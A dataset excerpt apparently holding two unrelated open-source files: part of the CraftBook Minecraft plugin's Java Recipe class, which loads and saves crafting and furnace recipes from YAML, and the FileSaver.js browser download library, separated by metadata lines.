@Override
public int hashCode() {
int ret = id.hashCode();
if(ingredients != null)
ret += ingredients.hashCode();
else if (items != null)
ret += items.hashCode();
ret += result.hashCode();
if(shape != null)
ret += shape.hashCode();
return ret + advancedData.hashCode();
}
public boolean hasAdvancedData() {
if(ingredients != null) {
for(CraftingItemStack stack : ingredients)
if(stack.hasAdvancedData())
return true;
}
if(items != null) {
for(CraftingItemStack stack : items.keySet())
if(stack.hasAdvancedData())
return true;
}
return result.hasAdvancedData() || !advancedData.isEmpty();
}
private Recipe(String id, YAMLProcessor config) throws InvalidCraftingException {
this.id = id;
ingredients = new ArrayList<>();
items = new LinkedHashMap<>();
load();
}
public Recipe(String id, RecipeType type, LinkedHashMap<CraftingItemStack, Character> items, List<String> shape, CraftingItemStack result, HashMap<String, Object> advancedData) throws InvalidCraftingException {
this.id = id;
this.type = type;
this.items = items;
this.shape = shape;
this.result = result;
this.advancedData = advancedData;
}
public Recipe(String id, RecipeType type, List<CraftingItemStack> ingredients, CraftingItemStack result, HashMap<String, Object> advancedData) throws InvalidCraftingException {
this.id = id;
this.type = type;
this.ingredients = ingredients;
this.result = result;
this.advancedData = advancedData;
}
private void load() throws InvalidCraftingException {
type = RecipeType.getTypeFromName(config.getString("crafting-recipes." + id + ".type"));
if (type != RecipeType.SHAPED) {
ingredients = getItems("crafting-recipes." + id + ".ingredients");
if (type == RecipeType.FURNACE) {
cookTime = config.getInt("crafting-recipes." + id + ".cook-time", 200);
experience = (float) config.getDouble("crafting-recipes." + id + ".experience", 0.0);
}
} else {
items = getShapeIngredients("crafting-recipes." + id + ".ingredients");
shape = config.getStringList("crafting-recipes." + id + ".shape", Collections.singletonList(""));
}
Iterator<CraftingItemStack> iterator = getItems("crafting-recipes." + id + ".results").iterator();
if(iterator.hasNext())
result = iterator.next();
else
throw new InvalidCraftingException("Result is invalid in recipe: "+ id);
if(iterator.hasNext()) {
ArrayList<CraftingItemStack> extraResults = new ArrayList<>();
while(iterator.hasNext())
extraResults.add(iterator.next());
addAdvancedData("extra-results", extraResults);
}
String permNode = config.getString("crafting-recipes." + id + ".permission-node", null);
if (permNode != null)
addAdvancedData("permission-node", permNode);
String permError = config.getString("crafting-recipes." + id + ".permission-error", null);
if (permError != null)
addAdvancedData("permission-error", permError);
List<String> actions = config.getKeys("crafting-recipes." + id + ".craft-actions");
if(actions != null && !actions.isEmpty()) {
for(String s : actions) {
if(s.equalsIgnoreCase("commands-console"))
addAdvancedData("commands-console", config.getStringList("crafting-recipes." + id + ".craft-actions." + s, new ArrayList<>()));
else if(s.equalsIgnoreCase("commands-player"))
addAdvancedData("commands-player", config.getStringList("crafting-recipes." + id + ".craft-actions." + s, new ArrayList<>()));
}
}
}
@SuppressWarnings("unchecked")
public void save() {
config.addNode("crafting-recipes." + id);
config.setProperty("crafting-recipes." + id + ".type", type.name);
if(type != RecipeType.SHAPED) {
LinkedHashMap<String, Integer> resz = new LinkedHashMap<>();
for(CraftingItemStack stack : ingredients) {
resz.put(stack.toString() + ' ', stack.getItemStack().getAmount());
}
config.setProperty("crafting-recipes." + id + ".ingredients", resz);
if (type == RecipeType.FURNACE) {
config.setProperty("crafting-recipes." + id + ".cook-time", cookTime);
config.setProperty("crafting-recipes." + id + ".experience", experience);
}
} else {
LinkedHashMap<String, Character> resz = new LinkedHashMap<>();
for(Map.Entry<CraftingItemStack, Character> craftingItemStackCharacterEntry : items.entrySet())
resz.put(craftingItemStackCharacterEntry.getKey().toString() + ' ', craftingItemStackCharacterEntry.getValue());
config.setProperty("crafting-recipes." + id + ".ingredients", resz);
config.setProperty("crafting-recipes." + id + ".shape", shape);
}
LinkedHashMap<String, Integer> resz = new LinkedHashMap<>();
resz.put(result.toString() + ' ', result.getItemStack().getAmount());
if(hasAdvancedData("extra-results")) {
ArrayList<CraftingItemStack> extraResults =
new ArrayList<>((Collection<? extends CraftingItemStack>) getAdvancedData("extra-results"));
for(CraftingItemStack s : extraResults)
resz.put(s.toString() + ' ', s.getItemStack().getAmount());
}
config.setProperty("crafting-recipes." + id + ".results", resz);
if(hasAdvancedData("permission-node"))
config.setProperty("crafting-recipes." + id + ".permission-node", getAdvancedData("permission-node"));
if(hasAdvancedData("permission-error"))
config.setProperty("crafting-recipes." + id + ".permission-error", getAdvancedData("permission-error"));
if(hasAdvancedData("commands-player") || hasAdvancedData("commands-console")) {
config.addNode("crafting-recipes." + id + ".craft-actions");
if(hasAdvancedData("commands-player"))
config.setProperty("crafting-recipes." + id + ".craft-actions.commands-player", getAdvancedData("commands-player"));
if(hasAdvancedData("commands-console"))
config.setProperty("crafting-recipes." + id + ".craft-actions.commands-console", getAdvancedData("commands-console"));
}
}
private LinkedHashMap<CraftingItemStack, Character> getShapeIngredients(String path) {
LinkedHashMap<CraftingItemStack, Character> items = new LinkedHashMap<>();
try {
for (String item : config.getKeys(path)) {
ItemStack stack = ItemUtil.makeItemValid(ItemSyntax.getItem(RegexUtil.PERCENT_PATTERN.split(item.trim())[0]));
if (stack != null) {
stack.setAmount(1);
CraftingItemStack itemStack = new CraftingItemStack(stack);
if(RegexUtil.PERCENT_PATTERN.split(item).length > 1)
itemStack.addAdvancedData("chance", Double.parseDouble(RegexUtil.PERCENT_PATTERN.split(item.trim())[1]));
items.put(itemStack, config.getString(path + '.' + item, "a").charAt(0));
}
}
} catch (Exception e) {
CraftBookPlugin.inst().getLogger().severe("An error occured generating ingredients for recipe: " + id);
CraftBookBukkitUtil.printStacktrace(e);
}
return items;
}
private List<CraftingItemStack> getItems(String path) {
List<CraftingItemStack> items = new ArrayList<>();
try {
for (Object oitem : config.getKeys(path)) {
String okey = String.valueOf(oitem);
String item = okey.trim();
ItemStack stack = ItemUtil.makeItemValid(ItemSyntax.getItem(RegexUtil.PERCENT_PATTERN.split(item)[0]));
if (stack != null) {
stack.setAmount(config.getInt(path + '.' + okey, 1));
CraftingItemStack itemStack = new CraftingItemStack(stack);
if(RegexUtil.PERCENT_PATTERN.split(item).length > 1)
itemStack.addAdvancedData("chance", Double.parseDouble(RegexUtil.PERCENT_PATTERN.split(item)[1]));
items.add(itemStack);
}
}
} catch (Exception e) {
CraftBookPlugin.inst().getLogger().severe("An error occured generating ingredients for recipe: " + id);
CraftBookBukkitUtil.printStacktrace(e);
}
return items;
}
public String getId() {
return id;
}
public RecipeType getType() {
return type;
}
public List<CraftingItemStack> getIngredients() {
return ingredients;
}
public String[] getShape() {
return shape.toArray(new String[shape.size()]);
}
public LinkedHashMap<CraftingItemStack, Character> getShapedIngredients() {
return items;
}
public CraftingItemStack getResult() {
return result;
}
// Furnace
public float getExperience() {
return this.experience;
}
public void setExperience(float experience) {
this.experience = experience;
}
public int getCookTime() {
return this.cookTime;
}
public void setCookTime(int cookTime) {
this.cookTime = cookTime;
}
//Advanced data
private HashMap<String, Object> advancedData = new HashMap<>();
public boolean hasAdvancedData(String key) {
return advancedData.containsKey(key);
}
public Object getAdvancedData(String key) {
return advancedData.get(key);
}
public void addAdvancedData(String key, Object data) {
CraftBookPlugin.logDebugMessage("Adding advanced data of type: " + key + " to an ItemStack! {" + String.valueOf(data) + '}',
"advanced-data.init");
advancedData.put(key, data);
}
public HashMap<String,Object> getAdvancedDataMap() {
return advancedData;
}
}
public enum RecipeType {
SHAPELESS("Shapeless"), FURNACE("Furnace"), SHAPED("Shaped");
private String name;
RecipeType(String name) {
this.name = name;
}
public String getName() {
return name;
}
public static RecipeType getTypeFromName(String name) {
if(name.equalsIgnoreCase("Shaped2x2") || name.equalsIgnoreCase("Shaped3x3")) {
CraftBookPlugin.logger().warning("You are using deprecated recipe type '" + name + "', we recommend you change it to 'shaped'!");
return SHAPED;
}
for (RecipeType t : RecipeType.values()) {
if (t.name.equalsIgnoreCase(name))
return t;
}
return SHAPELESS; // Default to shapeless
}
}
}
| {
"pile_set_name": "Github"
} |
/* FileSaver.js
* A saveAs() FileSaver implementation.
* 1.3.2
* 2016-06-16 18:25:19
*
* By Eli Grey, http://eligrey.com
* License: MIT
* See https://github.com/eligrey/FileSaver.js/blob/master/LICENSE.md
*/
/*global self */
/*jslint bitwise: true, indent: 4, laxbreak: true, laxcomma: true, smarttabs: true, plusplus: true */
/*! @source http://purl.eligrey.com/github/FileSaver.js/blob/master/FileSaver.js */
var saveAs = saveAs || (function(view) {
"use strict";
// IE <10 is explicitly unsupported
if (typeof view === "undefined" || typeof navigator !== "undefined" && /MSIE [1-9]\./.test(navigator.userAgent)) {
return;
}
var
doc = view.document
// only get URL when necessary in case Blob.js hasn't overridden it yet
, get_URL = function() {
return view.URL || view.webkitURL || view;
}
, save_link = doc.createElementNS("http://www.w3.org/1999/xhtml", "a")
, can_use_save_link = "download" in save_link
, click = function(node) {
var event = new MouseEvent("click");
node.dispatchEvent(event);
}
, is_safari = /constructor/i.test(view.HTMLElement)
, is_chrome_ios =/CriOS\/[\d]+/.test(navigator.userAgent)
, throw_outside = function(ex) {
(view.setImmediate || view.setTimeout)(function() {
throw ex;
}, 0);
}
, force_saveable_type = "application/octet-stream"
// the Blob API is fundamentally broken as there is no "downloadfinished" event to subscribe to
, arbitrary_revoke_timeout = 1000 * 40 // in ms
, revoke = function(file) {
var revoker = function() {
if (typeof file === "string") { // file is an object URL
get_URL().revokeObjectURL(file);
} else { // file is a File
file.remove();
}
};
setTimeout(revoker, arbitrary_revoke_timeout);
}
, dispatch = function(filesaver, event_types, event) {
event_types = [].concat(event_types);
var i = event_types.length;
while (i--) {
var listener = filesaver["on" + event_types[i]];
if (typeof listener === "function") {
try {
listener.call(filesaver, event || filesaver);
} catch (ex) {
throw_outside(ex);
}
}
}
}
, auto_bom = function(blob) {
// prepend BOM for UTF-8 XML and text/* types (including HTML)
// note: your browser will automatically convert UTF-16 U+FEFF to EF BB BF
if (/^\s*(?:text\/\S*|application\/xml|\S*\/\S*\+xml)\s*;.*charset\s*=\s*utf-8/i.test(blob.type)) {
return new Blob([String.fromCharCode(0xFEFF), blob], {type: blob.type});
}
return blob;
}
, FileSaver = function(blob, name, no_auto_bom) {
if (!no_auto_bom) {
blob = auto_bom(blob);
}
// First try a.download, then web filesystem, then object URLs
var
filesaver = this
, type = blob.type
, force = type === force_saveable_type
, object_url
, dispatch_all = function() {
dispatch(filesaver, "writestart progress write writeend".split(" "));
}
// on any filesys errors revert to saving with object URLs
, fs_error = function() {
if ((is_chrome_ios || (force && is_safari)) && view.FileReader) {
// Safari doesn't allow downloading of blob urls
var reader = new FileReader();
reader.onloadend = function() {
var url = is_chrome_ios ? reader.result : reader.result.replace(/^data:[^;]*;/, 'data:attachment/file;');
var popup = view.open(url, '_blank');
if(!popup) view.location.href = url;
url=undefined; // release reference before dispatching
filesaver.readyState = filesaver.DONE;
dispatch_all();
};
reader.readAsDataURL(blob);
filesaver.readyState = filesaver.INIT;
return;
}
// don't create more object URLs than needed
if (!object_url) {
object_url = get_URL().createObjectURL(blob);
}
if (force) {
view.location.href = object_url;
} else {
var opened = view.open(object_url, "_blank");
if (!opened) {
// Apple does not allow window.open, see https://developer.apple.com/library/safari/documentation/Tools/Conceptual/SafariExtensionGuide/WorkingwithWindowsandTabs/WorkingwithWindowsandTabs.html
view.location.href = object_url;
}
}
filesaver.readyState = filesaver.DONE;
dispatch_all();
revoke(object_url);
}
;
filesaver.readyState = filesaver.INIT;
if (can_use_save_link) {
object_url = get_URL().createObjectURL(blob);
setTimeout(function() {
save_link.href = object_url;
save_link.download = name;
click(save_link);
dispatch_all();
revoke(object_url);
filesaver.readyState = filesaver.DONE;
});
return;
}
fs_error();
}
, FS_proto = FileSaver.prototype
, saveAs = function(blob, name, no_auto_bom) {
return new FileSaver(blob, name || blob.name || "download", no_auto_bom);
}
;
// IE 10+ (native saveAs)
if (typeof navigator !== "undefined" && navigator.msSaveOrOpenBlob) {
return function(blob, name, no_auto_bom) {
name = name || blob.name || "download";
if (!no_auto_bom) {
blob = auto_bom(blob);
}
return navigator.msSaveOrOpenBlob(blob, name);
};
}
FS_proto.abort = function(){};
FS_proto.readyState = FS_proto.INIT = 0;
FS_proto.WRITING = 1;
FS_proto.DONE = 2;
FS_proto.error =
FS_proto.onwritestart =
FS_proto.onprogress =
FS_proto.onwrite =
FS_proto.onabort =
FS_proto.onerror =
FS_proto.onwriteend =
null;
return saveAs;
}(
typeof self !== "undefined" && self
|| typeof window !== "undefined" && window
|| this.content
));
// `self` is undefined in Firefox for Android content script context
// while `this` is nsIContentFrameMessageManager
// with an attribute `content` that corresponds to the window
if (typeof module !== "undefined" && module.exports) {
module.exports.saveAs = saveAs;
} else if ((typeof define !== "undefined" && define !== null) && (define.amd !== null)) {
define([], function() {
return saveAs;
});
}
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.